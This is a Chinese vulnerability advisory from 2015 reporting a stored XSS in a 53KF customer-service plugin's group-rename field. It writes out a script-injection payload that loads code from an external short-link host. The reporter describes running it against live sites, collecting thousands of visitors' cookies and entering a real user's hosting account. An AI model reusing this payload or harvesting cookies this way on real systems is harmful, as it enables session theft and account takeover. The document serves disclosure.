53KF某插件存储XSS跨站(华夏名网\59互联\7k7k等大量网站中枪)

基本字段

漏洞编号:
SSV-94389
披露/发现时间:
2015-01-12
提交时间:
2015-01-12
漏洞等级:
漏洞类别:
其他类型
影响组件:
53KF
漏洞作者:
淡蓝色の忧伤
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 Knownsec 共获得  0KB

简要描述:

很牛逼很牛逼真的很牛逼,不信,你看

详细说明:

53客服 某插件在网页右下角有个企业收藏夹

1.png

点开里面有个分组。 而这个分组到底是干什么的,怎么分配的。我现在也没弄清楚 但是它的分组名称是可修改的。 修改名称,插入代码 test"><script src=http://is.gd/wnezNK></script>

插入.png

但是,审查元素去看代码。发现没有,失败了?

没有.png

可是实际上我们已经收到cookie了。

总数.png

挂了一晚上加一个上午,收获颇丰啊O(∩_∩)O哈! 而且进去以后发现中枪的可不是一个域名。 7k7k,华夏名网,59互联,兄弟连+一大堆小站,6千加的cookie,怎么也有几百个网站吧。

7k7kand华夏名网.png

根据实现分析一下 当用户访问网站时,53kf会分配一个分组。 53kf 的分组是按照我不知道的条件出现在网页下,而且这个分组是可以跨网站,跨用户。 分组重命名的地方存在xss, 插入代码后,当用户访问网页时,53客服分配的分组如果是被我们插如代码的分组的话,用户就中枪了。 利用的时候,我们可以多改几个分组名,提高分组被系统选中的概率。 影响挺大的,理论上只要是你们的客户就可能中枪。 然后外部js代码都能执行了,你说我们能干什么?

漏洞证明:

59互联.png

测试中成功进入华夏名网某用户账户。

华夏登录.png

华夏主机.png

共 0  兑换了

PoC

暂无 PoC

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 1005
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负